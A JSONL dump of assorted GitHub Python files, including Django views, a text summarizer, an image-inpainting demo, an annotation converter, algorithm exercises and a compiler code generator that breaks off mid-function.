HttpResponse(status=403)\n\t\telse:\n\t\t\tif request.GET.get('t') == 'host':\n\t\t\t\tt = request.GET.get('t')\n\t\t\t\tname = request.GET.get('name')\n\t\t\t\tip = request.GET.get('ip')\n\t\t\t\tdict_host_info = request.GET\n\t\t\t\treturn render(request,'portal/modify_host.html',{'dict_host_info':dict_host_info})\n\t\t\telif request.GET.get('t') == 'idc':\n\t\t\t\tt = request.GET.get('t')\n\t\t\t\tname = request.GET.get('name')\n\t\t\t\tisp = request.GET.get('isp')\n\t\t\t\tdict_idc_info = request.GET\n\t\t\t\treturn render(request,'portal/modify_idc.html',{'dict_idc_info':dict_idc_info})\n\t\t\telif request.GET.get('t') == 'isp':\n\t\t\t\tdict_isp_info = request.GET\n\t\t\t\treturn render(request,'portal/modify_isp.html',{'dict_isp_info':dict_isp_info})\n\t\t\telif request.GET.get('t') == 'initHost':\n\t\t\t\tdict_init_info = request.GET\n\t\t\t\treturn render(request,'portal/initHost.html',{'dict_init_info':dict_init_info})\n\telse:\n return HttpResponse(status=403)\ndef initHost(request):\n\t#不允许直接访问该地址\n\tif 'HTTP_REFERER' in request.META.keys():\n\t\treferrer=request.META['HTTP_REFERER']\n\t\tif referrer != indexURL:\n\t\t\treturn HttpResponse(status=403)\n\t\telse:\n\t\t\treturn render(request,'portal/initHost.html')\n\telse:\n\t\treturn HttpResponse(status=403)\n#表单提交\ndef form_upload(request):\n\tif request.method == 'POST':\n\t\treturn HttpResponse('数据提交成功!')\n\telse:\n\t\treturn HttpResponse(\"test\")\ndef test1(request):\n\treturn render(request,'portal/formRes.html')\ndef test2(request):\n\treturn render(request,'portal/test2.html')\n\ndef test3(request):\n\treturn render(request,'portal/test3.html')\n\n\n","repo_name":"AnubisOrHades/pythonNote","sub_path":"WEB/django/xman/portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"41187545902","text":"from collections import OrderedDict\nimport unittest\n\nimport numpy as np\n\nfrom neursafe_fl.python.libs.secure.secure_aggregate.ssa_protector import \\\n SSAProtector\nfrom neursafe_fl.python.libs.secure.secure_aggregate.common import \\\n PseudorandomGenerator\n\n\nclass TestSSAProtector(unittest.TestCase):\n \"\"\"Test class of SSA protector.\n \"\"\"\n def setUp(self):\n self.protector = SSAProtector(\"test\", False)\n\n self.protector.id_ = \"my_id\"\n self.protector.b = 1234\n self.protector.s_uv_s = [(\"my_ia\", PseudorandomGenerator(1234)),\n (\"my_ie\", PseudorandomGenerator(1234))]\n\n self.prg = PseudorandomGenerator(1234)\n\n def test_should_success_encrypt_int(self):\n result = self.protector.encrypt(1)\n\n self.assertEqual(result, 1 + self.prg.next_value())\n\n def test_should_success_encrypt_float(self):\n result = self.protector.encrypt(1.123)\n\n self.assertEqual(result, 1.123 + self.prg.next_value())\n\n def test_should_success_encrypt_np_array(self):\n np_array = np.ones((1, 2, 3), dtype=np.int16)\n new_array = self.protector.encrypt(np_array)\n self.assertTrue(\n self.__equal(new_array,\n np.full_like(new_array,\n 1 + self.prg.next_value(np_array.shape))))\n\n def test_should_success_encrypt_list(self):\n np_array_list = [np.ones((2, 2, 3), dtype=np.int16),\n np.full((3, 1, 3), 2)]\n new_array_list = self.protector.encrypt(np_array_list)\n\n self.assertTrue(self.__equal(\n new_array_list[0],\n np.full((2, 2, 3), 1 + self.prg.next_value((2, 2, 3)))))\n self.assertTrue(self.__equal(\n new_array_list[1],\n np.full_like(new_array_list[1], 2 + self.prg.next_value((3, 1, 3)))))\n\n def test_should_success_encrypt_dict(self):\n np_array = np.ones((1, 2, 3), dtype=np.int16)\n ordered_dict = OrderedDict()\n ordered_dict['int'] = 1\n ordered_dict['float'] = 1.1\n ordered_dict['array'] = np_array\n new_dict = self.protector.encrypt(ordered_dict)\n self.assertEqual(new_dict['int'], 1 + self.prg.next_value())\n self.assertEqual(new_dict['float'], 1.1 + self.prg.next_value())\n self.assertTrue(self.__equal(\n new_dict['array'],\n np.full_like(new_dict['array'], 1 + self.prg.next_value((1, 2, 3)))))\n\n def __equal(self, array1, array2):\n for index, value in enumerate(array1):\n result = abs(value - array2[index]) < 0.000001\n if not result.all():\n return False\n return True\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"neursafe/neursafe-fl","sub_path":"neursafe_fl/python/libs/secure/secure_aggregate/test_ssa_protector.py","file_name":"test_ssa_protector.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"44"} +{"seq_id":"23200287926","text":"from QFSE.Sentence import Sentence\r\nfrom collections import defaultdict\r\nimport operator\r\nfrom sklearn import cluster\r\nimport numpy as np\r\nfrom sklearn.decomposition import PCA\r\nfrom QFSE.SummarizerBase import SummarizerBase\r\nfrom QFSE.Utilities import isPotentialSentence\r\n\r\nimport math\r\n\r\nQUERY_DOC_ALIAS = '_QUERY_'\r\nREDUNDANCY_THRESHOLD = 0.95\r\n\r\n#import ipdb\r\n\r\n\r\n\r\n## MMR implementation following https://github.com/vishnu45/NLP-Extractive-NEWS-summarization-using-MMR/blob/master/mmr_summarizer.py\r\n\r\n\r\ndef _TFs(sentences):\r\n \"\"\" Function to find the TF score of the words in the document cluster\r\n Inputs:\r\n sentences: sentences of the document cluster\r\n Outputs:\r\n tfWords: dictionary of words, TF score\r\n \"\"\"\r\n tfWords = {}\r\n for sent in sentences:\r\n for word in sent.tokens:\r\n word = word.lower()\r\n tfWords[word] = tfWords.get(word, 0) + 1\r\n\r\n return tfWords\r\n\r\n\r\n\r\ndef _IDFs(corpus):\r\n \"\"\" Function to find the IDF score of the words in the document cluster\r\n Inputs:\r\n sentences: sentences of the document cluster\r\n Outputs:\r\n idfWords: dictionary of words, IDF score\r\n \"\"\"\r\n N = len(corpus.documents)\r\n idfWords = {}\r\n\r\n all_words = []\r\n for doc in corpus.documents:\r\n all_words.extend(doc.tfs.keys())\r\n\r\n for word in all_words:\r\n n = 0\r\n for doc in corpus.documents:\r\n n += doc.tfs.get(word,0)\r\n try:\r\n idf = math.log10(float(N)/n)\r\n except ZeroDivisionError:\r\n idf = 0\r\n idfWords[word] = idf\r\n\r\n\r\n return idfWords\r\n\r\n\r\n\r\ndef _TFIDFs(sentences):\r\n \"\"\" Function to find the TF-IDF score of the words in the document cluster\r\n Inputs:\r\n sentences: sentences of the document cluster\r\n Outputs:\r\n tfidfWords: dictionary of words, TF-IDF score\r\n \"\"\"\r\n tfWords = _TFs(sentences)\r\n idfWords = _IDFs(sentences)\r\n tfidfWords = {}\r\n\r\n for word in tfs:\r\n tfidfScore = tfWords[word] * idfWords[word]\r\n\r\n if tfidfWords.get(tfidfScore, None) == None:\r\n tfidfWords[tfidfScore] = [word]\r\n else:\r\n tfidfWords[tfidfScore].append(word)\r\n\r\n return tfidfWords\r\n\r\n\r\ndef MMRScore(sentence, query, summary, lambta=0.5):\r\n \"\"\" Function to calculate the MMR score given a sentence, the query, \r\n and the current best set of sentences\r\n Inputs:\r\n sentence: sentence for which MMR score has to be calculated\r\n query: query sentence for the document cluster\r\n summary: list of sentences in the current summary\r\n lambta: MMR score hyperparameter\r\n Outputs:\r\n score: MMR score for the given sentence\r\n sim1: similarity score between sentene and query\r\n sim2: best similarity score w.r.t. summary so far\r\n \"\"\"\r\n sim1 = sentence.similarity(query)\r\n l_expr = lambta * sim1\r\n value = [float(\"-inf\")]\r\n\r\n for sent in summary:\r\n sim2 = sentence.similarity(sent)\r\n value.append(sim2)\r\n\r\n sim2 = max(value)\r\n\r\n r_expr = (1-lambta) * sim2\r\n score = l_expr - r_expr\t\r\n\r\n return score, sim1, sim2\r\n\r\n\r\nclass SummarizerMMR(SummarizerBase):\r\n \r\n def __init__(self, corpus, evaluateOnTheFly=False):\r\n super().__init__(corpus, evaluateOnTheFly=evaluateOnTheFly)\r\n\r\n # A dictionary of pairs of Sentence IDs (symettrical) with the similarity score between them,\r\n # this is to save time computing it when needed again.\r\n self.sentencesSimilarities = defaultdict(lambda: {})\r\n # the following will be initialized in the _getGenericSummaryText call\r\n self.sentenceClusters = {} # dict { clusterLabel -> [listOfSentencesInCluster] }\r\n self.sentenceClusterLabelsOrdered = [] # order list of clusters to use\r\n self.sentenceClusterIndexLast = -1 # the last index used in sentenceClusterLabelsOrdered\r\n self.isGenericClustering = False\r\n\r\n def _getGenericSummaryText(self, desiredWordCount):\r\n \r\n if self.isGenericClustering:\r\n self.sentenceClusters, self.sentenceClusterLabelsOrdered = self._prepareForClustering()\r\n self.sentenceClusterIndexLast = -1\r\n\r\n else:\r\n self._prepareForMMR()\r\n\r\n\r\n # concatenate sentences until the the word limit is up:\r\n finalSummaryTxtList, finalSummaryIds, numWordsInSummary = self._getNextGeneralSentences(desiredWordCount)\r\n\r\n if len(finalSummaryTxtList) == 0:\r\n finalSummaryTxtList = ['NO INFORMATION TO SHOW.']\r\n finalSummaryIds = []\r\n\r\n return finalSummaryTxtList, finalSummaryIds, numWordsInSummary\r\n\r\n \r\n def _prepareForMMR(self):\r\n # this code prepare for MMR by calculating the tfs, tf-idfs for each document words\r\n # there by calculating the tf-idfs. This is usefuly to build the initial query\r\n \r\n ## add tfs for each document\r\n for doc in self.corpus.documents:\r\n tfs = _TFs(doc.sentences)\r\n doc.tfs = tfs\r\n\r\n ## get idfs of each word:\r\n idfs = _IDFs(self.corpus)\r\n\r\n ## get tf-idf for each word in a document:\r\n tfidfs = {}\r\n for doc in self.corpus.documents:\r\n for word,value in doc.tfs.items():\r\n tfidfs[word] = value * idfs[word]\r\n doc.tfidfs = tfidfs\r\n\r\n\r\n def _prepareForClustering(self):\r\n # The algorithm here is:\r\n # PCA on each of the sentences' average word w2v vectors\r\n # K-means to clusters on the reduced-sized vectors\r\n # Take the best representative sentence from the largest clusters until max word count is reached\r\n\r\n # reduce the dimensionality of the vectors (from 300(w2v)/768(bert) to 20), since high dimensionality vectors are tough on K-Means:\r\n pca = PCA(n_components=20, random_state=0)\r\n vectors = [sent.representation for sent in self.allSentencesForPotentialSummaries]\r\n pca.fit(vectors)\r\n reducedVectors = pca.transform(vectors)\r\n\r\n # cluster the sentences by their reduced representation embeddings:\r\n k_means = cluster.KMeans(n_clusters=30, random_state=0)\r\n #vectorToSentence = {str(sent.spacyDoc.vector):sent for sent in corpus.allSentences}\r\n k_means.fit(reducedVectors)\r\n # count the number of sentences in each cluster:\r\n labels, labelCounts = np.unique(k_means.labels_[k_means.labels_ >= 0], return_counts=True)\r\n\r\n # group together the indices of the sentences that were labeled into the same cluster:\r\n sentenceClusters = defaultdict(lambda : []) # { labelOfCluster -> [list of sentence indices] }\r\n for idx, label in enumerate(k_means.labels_):\r\n sentenceClusters[label].append(idx)\r\n\r\n # keep the order of the labels that the clusters should be used:\r\n sentenceClusterLabelsOrdered = labels[np.argsort(-labelCounts)]\r\n\r\n return sentenceClusters, sentenceClusterLabelsOrdered\r\n\r\n\r\n def _getNextGeneralSentences(self, desiredWordCount):\r\n # concatenate sentences until the the word limit is up:\r\n numWordsInSummary = 0\r\n finalSummaryTxtList = []\r\n finalSummaryIds = []\r\n if self.isGenericClustering:\r\n while numWordsInSummary < desiredWordCount and not self._noMoreSentences():\r\n # get the next index to use in the sentenceClusterLabelsOrdered list (loop back to the beginning):\r\n self.sentenceClusterIndexLast = (self.sentenceClusterIndexLast + 1) % len(self.sentenceClusterLabelsOrdered)\r\n # get the index of the cluster to use now:\r\n curClusterLabel = self.sentenceClusterLabelsOrdered[self.sentenceClusterIndexLast]\r\n # get the best sentence in that cluster:\r\n bestSentenceInCluster = self._getBestSentence(self.allSentencesForPotentialSummaries,\r\n self.sentenceClusters[curClusterLabel], self.corpus)\r\n # append the chosen sentence to the summary:\r\n if bestSentenceInCluster != None:\r\n finalSummaryTxtList.append(bestSentenceInCluster.text)\r\n finalSummaryIds.append(bestSentenceInCluster.sentId)\r\n numWordsInSummary += len(bestSentenceInCluster)\r\n self.usedSentences[bestSentenceInCluster.sentId] = bestSentenceInCluster\r\n self.usedSentencesText[bestSentenceInCluster.textCompressed] = bestSentenceInCluster.sentId\r\n\r\n else:\r\n # now create MMR-based generic summary\r\n topWords = self._findTopWords()\r\n queryAsSentence = Sentence(QUERY_DOC_ALIAS, len(self.queries), \" \".join(topWords), self.corpus.representationStyle)\r\n\r\n # get an ordered list of sentences based on its MMR score:\r\n lambta = 0.5\r\n usedSentencesList = []\r\n sentenceMMRScores = [(sentence,) + MMRScore(sentence, queryAsSentence, usedSentencesList, lambta) # [(sent, mmrscore, sim1, sim2)]\r\n for sentence in self.allSentencesForPotentialSummaries] \r\n sentencesUsing = []\r\n while numWordsInSummary < desiredWordCount and not self._noMoreSentences():\r\n if len(sentencesUsing)>0:\r\n ## take the last added sentence and update the mmr score for the rest of the sentenes\r\n for index, sentMMR in enumerate(sentenceMMRScores):\r\n newSim2 = sentMMR[0].similarity(sentencesUsing[-1])\r\n if newSim2 > sentMMR[3]:\r\n mmrScore = lambta*sentMMR[2] - (1-lambta)*newSim2\r\n sentenceMMRScores[index] = (sentMMR[0], mmrScore, sentMMR[2], newSim2)\r\n \r\n sentenceMMRScores.sort(key=operator.itemgetter(1), reverse=True)\r\n # keep taking most query-similar, non-redundant sentences until we have enough:\r\n for index, (sentence,_,_,_) in enumerate(sentenceMMRScores):\r\n if sentence.sentId not in self.usedSentences and sentence.textCompressed not in self.usedSentencesText:\r\n sentencesUsing.append(sentence)\r\n finalSummaryTxtList.append(sentence.text)\r\n finalSummaryIds.append(sentence.sentId)\r\n numWordsInSummary += len(sentence)\r\n self.usedSentences[sentence.sentId] = sentence\r\n self.usedSentencesText[sentence.textCompressed] = sentence.sentId\r\n sentenceMMRScores.pop(index)\r\n break\r\n\r\n return finalSummaryTxtList, finalSummaryIds, numWordsInSummary\r\n\r\n\r\n def _findTopWords(self, max_num=20):\r\n ## give a list of top frequent words based on tf-idf scores\r\n top_k_words = []\r\n for doc in self.corpus.documents:\r\n top_k_words.extend([(word, doc.tfidfs[word]) for word in sorted(doc.tfidfs, key=doc.tfidfs.__getitem__, reverse=True)[:max_num]])\r\n\r\n unique_ranked_words = []\r\n top_k_words = sorted(top_k_words, key=lambda x:x[1], reverse=True)\r\n for word,score in top_k_words:\r\n if word in unique_ranked_words:\r\n continue\r\n else:\r\n unique_ranked_words.append(word)\r\n\r\n return unique_ranked_words[:max_num]\r\n\r\n \r\n def _getBestSentence(self, allSentencesList, possibleIndicesOfSentences, corpus):\r\n # gets the highest scoring sentence in the possible sentences in reference to the corpus given\r\n bestSentence = None\r\n bestSentScore = -1\r\n for idx in possibleIndicesOfSentences:\r\n sentence = allSentencesList[idx]\r\n if sentence.sentId not in self.usedSentences and sentence.textCompressed not in self.usedSentencesText: # skip sentences that were already used\r\n sentScore = self._getSentenceScore(sentence, self.corpus.wordCounter)\r\n if sentScore > bestSentScore:\r\n bestSentence = sentence\r\n bestSentScore = sentScore\r\n return bestSentence\r\n\r\n def _getSentenceScore(self, sentence, corpusWordCounter):\r\n # the score is the average word weight in the sentence\r\n # where word weight is the number of times the word appears in the corpus\r\n sentenceWordWeightTotal = 0\r\n for token in sentence.tokens:\r\n sentenceWordWeightTotal += corpusWordCounter[token.lower()]\r\n sentenceWordWeightAvg = float(sentenceWordWeightTotal) / len(sentence)\r\n return sentenceWordWeightAvg\r\n\r\n ##numEntities = len(sentence.spacyDoc.ents)\r\n #numSignificantWords = float(sentence.spacyDoc._.num_significant_words)\r\n #sentLen = float(len(sentence.spacyDoc))\r\n #return (numSignificantWords / sentLen) * log(sentLen)\r\n\r\n\r\n def _getQuerySummaryText(self, query, numSentencesNeeded, sentences):\r\n # The algorithm here is:\r\n # Spacy-vectorize the query\r\n # Get the similarity of the query to each of the potential sentences in the corpus\r\n # Take the most similar sentences to the query as long as it isn't redundant to the sentences already added\r\n # (and not sentences in previous summaries)\r\n\r\n if self._noMoreSentences():\r\n return [\"NO MORE INFORMATION.\"], [], 0\r\n\r\n if query == '':\r\n finalSummaryTxtList, finalSummaryIds, numWordsInSummary = self._getNextGeneralSentences(numSentencesNeeded * 20)\r\n return finalSummaryTxtList, finalSummaryIds, numWordsInSummary\r\n\r\n\r\n # make a sentence object for the query:\r\n queryAsSentence = Sentence(QUERY_DOC_ALIAS, len(self.queries), query, self.corpus.representationStyle)\r\n\r\n # get an ordered list of sentences based on its MMR score:\r\n lambta = 0.5\r\n usedSentencesList = [v for k,v in self.usedSentences.items()]\r\n sentenceMMRScores = [(sentence,) + MMRScore(sentence, queryAsSentence, usedSentencesList, lambta) # [(sent, mmrscore, sim1, sim2)]\r\n for sentence in self.allSentencesForPotentialSummaries] \r\n sentencesUsing = []\r\n while(len(sentencesUsing)<=numSentencesNeeded):\r\n if len(sentencesUsing)>0:\r\n ## take the last added sentence and update the mmr score for the rest of the sentenes\r\n for index, sentMMR in enumerate(sentenceMMRScores):\r\n newSim2 = sentMMR[0].similarity(sentencesUsing[-1])\r\n if newSim2 > sentMMR[3]:\r\n mmrScore = lambta*sentMMR[2] - (1-lambta)*newSim2\r\n sentenceMMRScores[index] = (sentMMR[0], mmrScore, sentMMR[2], newSim2)\r\n \r\n sentenceMMRScores.sort(key=operator.itemgetter(1), reverse=True)\r\n # keep taking most query-similar, non-redundant sentences until we have enough:\r\n for index, (sentence,_,_,_) in enumerate(sentenceMMRScores):\r\n if sentence.sentId not in self.usedSentences and sentence.textCompressed not in self.usedSentencesText:\r\n sentencesUsing.append(sentence)\r\n self.usedSentences[sentence.sentId] = sentence\r\n self.usedSentencesText[sentence.textCompressed] = sentence.sentId\r\n sentenceMMRScores.pop(index)\r\n break\r\n\r\n # return also the length in words of the returned summary:\r\n summaryLength = sum(len(sent) for sent in sentencesUsing)\r\n\r\n return [sent.text for sent in sentencesUsing], [sent.sentId for sent in sentencesUsing], summaryLength\r\n\r\n\r\n def _isRedundant(self, sentence, otherSentences):\r\n # check if the sentence is too similar to the other sentences:\r\n for otherSentence in otherSentences:\r\n # see if we know the similarities already from before:\r\n if not sentence.sentId in self.sentencesSimilarities or not otherSentence.sentId in self.sentencesSimilarities[sentence.sentId] and not self._isRedundant(sentence, sentencesUsing):\r\n sim = sentence.similarity(otherSentence)\r\n self.sentencesSimilarities[sentence.sentId][otherSentence.sentId] = sim\r\n self.sentencesSimilarities[otherSentence.sentId][sentence.sentId] = sim\r\n\r\n if self.sentencesSimilarities[sentence.sentId][otherSentence.sentId] > REDUNDANCY_THRESHOLD:\r\n return True\r\n\r\n return False\r\n\r\n def _isPotentialSentence(self, sentence):\r\n return isPotentialSentence(sentence)\r\n\r\n def _noMoreSentences(self):\r\n return len(self.usedSentences) == len(self.allSentencesForPotentialSummaries)\r\n","repo_name":"BIU-NLP/iFACETSUM","sub_path":"QFSE/SummarizerMMR.py","file_name":"SummarizerMMR.py","file_ext":"py","file_size_in_byte":16815,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"44"} +{"seq_id":"74123777092","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport os\nimport sys\nimport xml.etree.ElementTree as ET\nfrom multiprocessing import Pool\nimport xml_converter_lib\nimport time\n\n'''\nINSTRUCTIONS\n-------------------------------------------------------------------\nThis is a converter script to convert Pascal VOC .xml annotation \nfiles to Darknet .txt annotation files.\n\nPut both xml_converter.py and xml_converter_lib.py in the dir \nabove the folder containing the annotations in Pascal VOC format.\n\nPut labels.txt in the dir above xml_converter.py.\n\nIf you want to change where the text files are written to, modify \ndef write_converted_file() in xml_converter_lib.py.\n\nDefault write location is /txt.\n\nUses multiprocessing to spawn multiple threads for minor speed-up.\nRun main() if you run into problems.\n'''\n\ndef main(num_threads = xml_converter_lib.getThreads()):\n\n subdir = input(\"Enter subdir: \")\n\n start = time.time()\n p = Pool(processes = num_threads)\n files = xml_converter_lib.FileGenerator(subdir)()\n p.map(xml_converter_lib.write_converted_file, files)\n p.close()\n p.join()\n end = time.time()\n\n print(\"\")\n print(\"Completed in {0:.3f} seconds.\".format(end-start))\n print(\"\")\n\nif __name__ == \"__main__\":\n main()\n \n ","repo_name":"tgymartin/PascalVOC2Darknet","sub_path":"xml_converter.py","file_name":"xml_converter.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33523544992","text":"import tkinter as tk\nfrom tkinter import filedialog\nimport os\nimport sys\n\n\ndef get_title(file_path):\n title = os.path.splitext(file_path)[0]\n title = title.split('_')[1]\n title = title.replace('-', ' ')\n return title\n\n\nGALLERY_OPTION = \"gallery\"\nLINK_OPTION = \"link\"\n\n# read in argument value\nif len(sys.argv) == 2:\n OPTION = sys.argv[1]\nelse:\n OPTION = 0\n\n# Select images from directory\nroot = tk.Tk()\nroot.withdraw()\nfile_paths = filedialog.askopenfilenames()\n# file_paths = ('C:/Users/John/projects/johng/static/images/milan/2017-04-05T123000_VIBRA-Team.jpg',\n# 'C:/Users/John/projects/johng/static/images/milan/2017-04-06T063907_Gepaeck.jpg')\n\n# get date of oldest image\nfile_path = file_paths[-1]\ndate_oldest = os.path.basename(file_path)[:10]\n\n# build header\nheader = [\"+++\", 'date = \"{}\"'.format(date_oldest),\n \"draft = true\",\n 'title = \"Titel\"',\n 'image = \"\"',\n 'categories = [\"Milan\"]',\n \"+++\"]\n\n# write draft blog entry\nwith open('content/post/italy/draft.md', 'w') as output:\n output.write(\"\\n\".join(header))\n\n output.write(\"\\n\\n\")\n\n output.write(\"{{< load-photoswipe >}}\\n\\n\")\n\n tab = ''\n\n if OPTION == GALLERY_OPTION:\n output.write(\"{{< gallery >}}\\n\\n\")\n tab = \"\\t\"\n\n for file_path in file_paths:\n title = get_title(file_path)\n rel_path = file_path.split(\"/static\")[1]\n\n if OPTION == LINK_OPTION:\n image_link = \"![{}]({})\".format(title, rel_path)\n else:\n image_link = tab + '{{{{< figure caption=\"{}\" src=\"{}\" alt=\"{}\" >}}}}'.format(title, rel_path, title)\n\n output.write(image_link + \"\\n\\n\")\n\n if OPTION == GALLERY_OPTION:\n output.write(\"{{< /gallery >}}\")\n","repo_name":"jhgee/johng","sub_path":"createDraft.py","file_name":"createDraft.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"30052371684","text":"\"\"\"\nCreated by Alex Wang on 2018-03-13\n图像复原美化:\n inpaint水印去除\n\"\"\"\nimport cv2\nimport numpy as np\n\n\ndef test_image_inpaint():\n \"\"\"\n cv2.inpaint(src, inpaintMask, inpaintRadius, flags[, dst]) → dst\n Parameters:\n\n\t* src – Input 8-bit 1-channel or 3-channel image.\n\t* inpaintMask – Inpainting mask, 8-bit 1-channel image. Non-zero pixels indicate the area that needs to be inpainted.\n\t* dst – Output image with the same size and type as src .\n\t* inpaintRadius – Radius of a circular neighborhood of each point inpainted that is considered by the algorithm.\n\t* flags –\n Inpainting method that could be one of the following:\n\n\t\t* INPAINT_NS Navier-Stokes based method [Navier01]\n\t\t* INPAINT_TELEA Method by Alexandru Telea [Telea04].\n :return:\n \"\"\"\n img = cv2.imread('scenery.jpg')\n print(img.shape)\n img_black = img.copy()\n black_block = np.zeros(shape=(20, 20, 3), dtype=np.uint8)\n img_black[690:710, 100:120, :] = black_block\n\n white_block = np.ones(shape=(20, 20), dtype=np.uint8)\n mask_image = np.zeros(shape=(img.shape[0], img.shape[1]), dtype=np.uint8)\n print(mask_image.shape)\n mask_image[690:710, 100:120] = white_block\n img_recovery = cv2.inpaint(img_black, mask_image, 3, cv2.INPAINT_NS)\n\n cv2.imshow('img', img)\n cv2.imshow('img_black', img_black)\n cv2.imshow('img_recovery', img_recovery)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n test_image_inpaint()\n","repo_name":"alexwongdl/PythonTemplate","sub_path":"test/test_opencv/image_recovery.py","file_name":"image_recovery.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27916982528","text":"# 로봇 청소기\n# 현재칸이 청소되어 있지 않을 경우 현재칸을 청소한다.\n# 현재 칸 기준 4방향이 모두 청소되어있을 경우 1. 바라보는 방향을 유지한채 후진한다. 2. 뒤쪽칸이 벽이면 작동을 멈춘다.abs\n# 4방향 중 청소되지 않은 빈칸이 있을 경우 1. 반시계 방향으로 회전, 2. 바라보는 방향이 청소x면 전진, 3. 현재칸을 청소한다로 돌아간다.\n# 0은 청소x, 1은 벽을 의미한다.\n\nfrom collections import deque\nimport sys\nread = sys.stdin.readline\n\nn, m = map(int, read().split())\nr, c, d = map(int, read().split())\n# 0 : 북, 1 : 동, 2 : 남, 3 : 서\ndx = [-1, 0, 1, 0]\ndy = [0, 1, 0, -1]\n\ngraph = []\nfor i in range(n):\n graph.append(list(map(int, read().split())))\n\nvisited = [[False]*m for _ in range(n)]\nflag = 0\n\ndef bfs():\n global cnt\n global d\n global flag\n queue = deque()\n queue.append((r, c))\n visited[r][c] = True\n cnt = 1\n\n while queue:\n x, y = queue.popleft()\n\n for i in range(4):\n d = (d-1)%4 # 1씩 감소시켜 반시계 방향으로 탐색\n nx, ny = x+dx[d], y+dy[d]\n\n if graph[nx][ny]==0 and not visited[nx][ny]: # 어차피 벽이 1로 둘러싸여 0<=nx/', UserAPI.as_view()),\n path('api/moims/', MoimListView.as_view(), name='moim_list'),\n path('api/moims/', MoimView.as_view(), name='moim_detail'),\n path('api/moims//schedules', ScheduleListView.as_view(), name='moim_detail'),\n path('api/moims//schedules/', ScheduleView.as_view(), name='moim_detail'),\n path('api/articles/', ArticleListView.as_view(), name='article_list'),\n path('api/articles/', ArticleView.as_view(), name='article_detail'),\n]\n","repo_name":"mylumiere/somoim","sub_path":"back/back/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74604043331","text":"#!/usr/bin/env python3\n\"\"\"\nAutor: Matheus da Silva Garcias\nMatrícula: 20171BSI0456\nProblema: https://open.kattis.com/problems/speedlimit\nResultado: https://open.kattis.com/submissions/5463805\n\"\"\"\n\nfrom sys import stdin, stdout\n\ninput = stdin.readline\nprint = stdout.write\n\nn = int(input())\n\nwhile(n > -1):\n miles = 0\n last_t = 0\n for _ in range(n):\n s, t = [int(x) for x in input().strip().split(' ')]\n tmp = t\n t -= last_t\n miles += t * s\n last_t = tmp\n print(\"%d miles\\n\" % miles)\n\n n = int(input())","repo_name":"0xdeadbad/Kattis-TPA","sub_path":"src/speedlimit/speedlimit.py","file_name":"speedlimit.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3235567923","text":"from pprint import pprint\n\n\nclass Codegen:\n def __init__(self):\n self.semantic_errors = []\n self.semantic_stack = []\n self.program_block = []\n self.cur_temp = 1000\n self.temp = {}\n self.cur_mem_addr = 500\n self.func_memory_cur = 2000\n self.memory = {}\n self.break_stack = []\n self.main_access_link = None\n self.fun_declarating = False\n self.arg_declarating = False\n self.action_symbols = {\n 'pid': self.pid,\n 'pnum': self.pnum,\n 'array_address': self.array_address,\n 'assign': self.assign,\n 'add': self.add,\n 'mult': self.mult,\n 'save': self.save,\n 'jp': self.jp,\n 'jpf': self.jpf,\n 'label': self.label,\n 'relop': self.relop,\n 'relop_sign': self.relop_sign,\n 'sign': self.sign,\n 'signed_num': self.signed_num,\n 'while': self.whil,\n 'pop': self.pop,\n 'output': self.output,\n 'save_arr': self.save_arr,\n 'tmp_save': self.tmp_save,\n 'cmp_save': self.cmp_save,\n 'jp_break': self.jp_break,\n 'jp_switch': self.jp_switch,\n 'jpf_switch': self.jpf_switch,\n 'function_call': self.function_call,\n 'var': self.var,\n 'arg': self.arg,\n 'fun_declaration': self.fun_declaration,\n 'fun_declaration_end': self.fun_declaration_end,\n 'param_var': self.param_var,\n 'param_arr': self.param_arr,\n 'fun_declarated': self.fun_declarated,\n 'arg_declaration': self.arg_declaration,\n 'return_stmt': self.return_stmt,\n }\n self.arg_actions = ['pid', 'pnum', 'sign', 'relop_sign',\n 'fun_declaration', 'arg_declaration']\n self.symbol_table = {}\n self.temp_args = []\n self.function = None\n self.callers = []\n self.function_arg_number = 0\n self.temp_id = None\n self.calling_function = []\n\n def find_addr(self):\n t = self.cur_mem_addr\n self.cur_mem_addr += 4\n return t\n\n def get_temp(self):\n t = self.cur_temp\n self.cur_temp += 4\n return t\n\n def find_func_addr(self):\n t = self.func_memory_cur\n self.func_memory_cur += 4\n return t\n\n def generate(self, action_symbol, arg=None):\n print('==== action sym',action_symbol)\n if not self.main_access_link:\n t = self.get_temp()\n self.main_access_link = t\n print(f'{action_symbol[1:]}({arg})\\r\\t\\t\\t\\t\\t\\t\\t\\t-> {str(self.semantic_stack)[:-1]}')\n self.action_symbols[action_symbol[1:]](arg)\n\n def pid(self, args):\n print(args)\n tmp = 0\n if len(args) == 3:\n void_type = args[0]\n else:\n tmp = 1\n lexeme = args[1 - tmp]\n line_no = args[2 - tmp]\n self.temp_id = lexeme\n if lexeme in self.symbol_table and self.symbol_table[lexeme]['type'] == 'func':\n self.callers.append(self.function)\n self.calling_function.append(lexeme)\n return\n if self.fun_declarating:\n if lexeme == 'output':\n self.calling_function.append(lexeme)\n return\n for key, value in self.symbol_table[self.function][\"args\"]:\n if key == lexeme:\n self.semantic_stack.append(value['addr'])\n return\n for key, value in self.symbol_table[self.function][\"vars\"].items():\n if key == lexeme:\n self.semantic_stack.append(value['addr'])\n return\n for 